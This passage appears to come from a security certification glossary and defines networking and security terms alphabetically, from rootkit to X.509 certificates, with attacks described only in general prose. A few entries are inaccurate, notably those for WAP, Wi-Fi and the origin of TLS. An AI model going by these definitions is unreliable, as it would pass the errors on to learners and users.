A process used to undo changes or transactions when they do not complete, when they are suspected of being invalid or unwanted, or when they cause problems.

rootkit

A piece of software that is installed and hidden on a computer, mainly for the purpose of keeping the system compromised. A rootkit conceals its own files, processes, and network connections from the operating system and from security tools so that the intruder's access persists undetected.

round

One iteration of a cipher's core transformation (substitution, permutation, and mixing in of a round key). Block ciphers apply many rounds in succession to each block rather than a single operation; for example, AES uses 10, 12, or 14 rounds depending on key length.

router

A device that connects multiple network segments and routes packets between them. Routers split broadcast domains.

rule-based access control (RBAC)

A rule-based access control method is an extension of access control that includes stateful testing to determine whether a particular request for resource access may be granted. When a rule-based method is in force, access to resources may be granted or restricted based on conditional testing.

S

Secure Hypertext Transfer Protocol (S-HTTP)

An alternative to HTTPS, developed to support connectivity for banking transactions and other secure Web communications.

Secure/Multipurpose Internet Mail Extensions (S/MIME)

An Internet protocol governed by RFC 2633 and used to secure email communications through encryption and digital signatures for authentication. It generally works with PKI to validate digital signatures and related digital certificates.

Secure Shell (SSH)

A protocol designed to support secure remote login, along with secure access to other services across an unsecure network. SSH includes a secure transport layer protocol that provides server authentication, confidentiality (encryption), and integrity (message digest functions), along with a user-authentication protocol and a connection protocol that runs on top of the user-authentication protocol.

Secure Sockets Layer (SSL)

An Internet protocol that uses connection-oriented, end-to-end encryption to ensure that client/server communications are confidential (encrypted) and meet integrity constraints (message digests). Because SSL is independent of the application layer, any application protocol can work with SSL transparently. SSL can also work with a secure transport layer protocol, which is why the term SSL/TLS appears frequently. See also Transport Layer Security.

security association (SA)

A method in IPsec that accounts for individual security settings for IPsec data transmission.

security baseline

Defined in a company’s or organization’s security policy, a security baseline is a specific set of security-related modifications, patches, and settings for the systems and services in use that underpins the technical implementation of security.

security groups

A logical boundary that helps enforce security policies.

security policies

Documentation of the goals and elements of an organization’s systems and resources.

sender

The party that originates a message.

sequence number

A counting mechanism in IPsec that increases incrementally each time a packet is transmitted in an IPsec communication path. It protects the receiver from replay attacks.

service level agreement (SLA)

A contract between two companies, or between a company and an individual, that specifies a level of service to be provided by one party to the other. Supplying replacement equipment within 24 hours of loss of that equipment or related services is a simple example of an SLA.

signature-based monitoring

A signature-based monitoring method is sometimes considered a part of the misuse-detection category. This type of monitoring method looks for specific byte sequences or signatures that are known to appear in attack traffic. The signatures are identified through careful analysis of the byte sequence from captured attack traffic.

Simple Network Management Protocol (SNMP)

A UDP-based application layer Internet protocol used for network management, SNMP is governed by RFCs 2570 and 2574. In converting management information between management consoles (managers) and managed nodes (agents), SNMP implements configuration and event databases on managed nodes that can be configured to respond to interesting events by notifying network managers.

Simple Mail Transport Protocol (SMTP) relay

An exploitation of SMTP relay agents used to send out large numbers of spam messages.

single sign-on (SSO)

The concept or process of using a single logon authority to grant users access to resources on a network regardless of what operating system or application is used to make or handle a request for access. The concept behind the term is that users need to authenticate only once and can then access any resources available on a network.

smart card

A credit card–size device that contains an embedded chip. On this chip, varying and multiple types of data can be stored, such as a driver’s license number, medical information, passwords, or other authentication data, and even bank account data.

sniffer

A hardware device or software program used to capture and analyze network data in real time. Because such a device can typically read and interpret all unencrypted traffic on the cable segment to which it is attached, it can be a powerful tool in any competent hacker’s arsenal.

social engineering

The process of using human behavior to attack a network or gain access to resources that would otherwise be inaccessible. Social engineering is a term that emphasizes the well-known fact that poorly or improperly trained individuals can be persuaded, tricked, or coerced into giving up passwords, phone numbers, or other data that can lead to unauthorized system access, even when strong technical security measures can otherwise prevent such access.

spam

A term that refers to the sending of unsolicited commercial email.

spoofing

A technique for generating network traffic that contains a different (and usually quite specific) source address from that of the machine actually generating the traffic. Spoofing is used for many reasons in attacks: It foils easy identification of the true source, it permits attackers to take advantage of existing trust relationships, and it deflects responses to attacks against some (usually innocent) third party or parties.

spyware

Software that communicates information from a user’s system to another party without notifying the user.

standard

This term is used in many ways. In some contexts, it refers to best practices for specific platforms, implementations, OS versions, and so forth. Some standards are mandatory and ensure uniform application of a technology across an organization. In other contexts, a standard might simply describe a well-defined rule used to produce a desired behavior or action.

steganography

A word of Greek origin meaning hidden writing; the art and science of hiding messages so that unintended recipients are not even aware that a message exists.

storage policy

A policy defining the standards for storing each classification level of data.

switch

A hardware device that manages multiple, simultaneous pairs of connections between communicating systems. Switches split collision domains, but can also provide greater aggregate bandwidth between pairs or groups of communicating devices because each switched link normally gets exclusive access to available bandwidth.

symmetric key

A single encryption key that is generated and used to encrypt data. This data is then passed across a network. After that data arrives at the recipient device, the same key used to encrypt that data is used to decrypt it. This technique requires a secure way to share keys because both the sender and receiver use the same key (also called a shared secret because that key should be unknown to third parties).

system logging

The process of collecting system data to be used for monitoring and auditing purposes.

system monitoring

A method of monitoring used to analyze events that occur on individual systems.

T

Terminal Access Controller Access-Control System Plus (TACACS+)

An authentication, access control, and accounting standard that relies on a central server to provide access control over network resources, including services, file storage, and network routing hardware.

threat

A danger to a computer network or system (for example, a hacker or virus represents a threat).

token

A hardware- or software-based authentication system in which two or more sets of matched devices or software generate matching random passwords with a high degree of complexity.

Transmission Control Protocol/Internet Protocol (TCP/IP) hijacking

A process used to steal an ongoing TCP/IP session for the purposes of attacking a target computer. Essentially, hijacking works by spoofing network traffic so that it appears to originate from a single computer, when in actuality it originates elsewhere so that the other party in the communication doesn’t realize another computer has taken over an active communications session.

Transport Layer Security (TLS)

An end-to-end encryption protocol originally specified in ISO Standard 10736 that provides security services as part of the transport layer in a protocol stack.

Trojan

A form of malware that appears to be useful software but has code hidden inside that will attack your system directly or allow the system to be infiltrated by the originator of the code when it is executed. A Trojan horse is software hidden inside other software and is commonly used to infect systems with viruses, worms, or remote-control software.

Trusted Platform Module (TPM)

A secure cryptoprocessor used to authenticate hardware devices such as a PC or laptop.

U–V

uninterruptible power supply (UPS)

A power supply that sits between the wall power and the computer. In the event of power failure at the wall, the UPS takes over and powers the computer so that you can take action before data loss occurs.

video surveillance

A surveillance method using closed-circuit television (CCTV), with which the picture is viewed or recorded as a means of security.

virtualization technology

A technology developed to allow a guest operating system to run along with a host operating system while using one set of hardware.

virtual local area network (VLAN)

A software technology that allows for the grouping of network nodes connected to one or more network switches into a single logical network. By permitting logical aggregation of devices into virtual network segments, VLANs offer simplified user management and network resource access controls for switched networks.

virtual private network (VPN)

A popular technology that supports reasonably secure, logical, private network links across some unsecure public network infrastructure, such as the Internet. VPNs are more secure than traditional remote access because they can be encrypted and because VPNs support tunneling (the hiding of numerous types of protocols and sessions within a single host-to-host connection).

virus

A piece of malicious code that spreads to other computers by design, although some viruses also damage the systems on which they reside. Viruses can spread immediately upon reception or implement other unwanted actions, or they can lie dormant until a trigger in their code causes them to become active. The hidden code a virus executes is called its payload.

vulnerability

A weakness in hardware or software that can be used to gain unauthorized or unwanted access to or information from a network or computer.

W

warm site

A backup site that has some of the equipment and infrastructure necessary for a business to begin operating at that location. Typically, companies or organizations bring their own computer systems and hardware to a warm site, but that site usually already includes a ready-to-use networking infrastructure and also might include reliable power, climate controls, lighting, and Internet access points.

wet-pipe fire suppression

A sprinkler system with pressurized water in its pipes. If a fire starts, the pipes release water immediately and offer the fastest and most effective means of water-based fire suppression.

whole disk encryption

Whole disk encryption can be either hardware or software based, and is meant to encrypt the entire contents of the drive. This can include even temporary files and memory.

Wi-Fi

Short for the Wireless Fidelity communication standard.

Wireless Application Protocol (WAP)

A long-range mobile-equipment communications protocol used by server-side processes to perform functions needed within the website.

Wired Equivalent Privacy (WEP)

A security protocol used in IEEE 802.11 wireless networking, WEP is designed to provide security equivalent to that found in regular wired networks. This is achieved by using basic symmetric encryption to protect data sent over wireless connections so that sniffing of wireless transmissions doesn’t produce readable data and so that drive-by attackers cannot access a wireless LAN without additional effort and attacks.

wireless local area networks (WLANs)

A networking technology that uses high-frequency radio waves rather than wires to communicate between nodes.

Wireless Transport Layer Security (WTLS)

WTLS defines a security level for applications based on the Wireless Application Protocol (WAP). As its acronym indicates, WTLS is based on transport layer security (TLS) but has been modified to work with the low-bandwidth, high-latency, and limited-processing capabilities found in many wireless networking implementations. WTLS also provides authentication, data integrity, and confidentiality mechanisms, all based on encryption methods using shared 56- or 128-bit symmetric keys.

worm

A special type of virus designed primarily to reproduce and replicate itself on as many computer systems as possible, a worm does not normally alter files but rather remains resident in a computer’s memory. Worms typically rely on access to operating system capabilities that are invisible to users.

X–Y–Z

X.500 directory

A standard that regulates global, distributed directory services databases; it is also known as a white pages directory (because lookup occurs by name, rather than by job role or other categorized information, as in a yellow pages type of system).

X.509 digital certificate

A digital certificate that uniquely identifies a potential communications party or participant. Among other things, an X.509 digital certificate includes a party’s name and public key, but it can also include organizational affiliation, service or access restrictions, and a host of other access- and security-related information.
